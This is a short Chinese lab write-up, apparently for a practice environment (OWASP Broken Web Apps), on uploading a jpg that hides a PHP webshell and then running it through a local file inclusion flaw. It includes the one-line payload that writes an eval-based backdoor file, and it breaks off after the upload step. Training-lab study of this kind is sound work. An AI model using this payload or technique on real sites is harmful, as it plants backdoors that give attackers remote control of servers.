中低安全级别的文件包含漏洞利用
实验环境
kali
owasp_broken_web_apps
windows 10
实验工具
中国菜刀,burpsuit,图片木马插入工具,一句话木马
实验内容:
打开owasp_broken_web_apps的网址并将文件上传漏洞安全级别为高级即只可以上传,后缀为jpg格式的图片,无法上传php文件,也无法通过代理绕过,(即使通过代理修改后缀绕过,一句话木马功不能得到发挥,不可执行删改等操作),此时web网站正好有本地文件包含漏洞。则可以利用此漏洞将隐藏在图片中的木马执行。
文件包含:
是一个方便与开发人员缩减代码量的一种方法。直接将另一个文件调用过来。
实验过程:
在网络上下载一张小图片,将器拖拽到edjpgom工具上,打开工具后,在空白处写上小马:
<?fputs(fopen("shell66.php","w"),'<?php eval($_POST[moyi]);?>') ?>
点击OK注入图片。
将刚刚注入的图片上传到目标网站:
文件上传后,我们使用网站后台,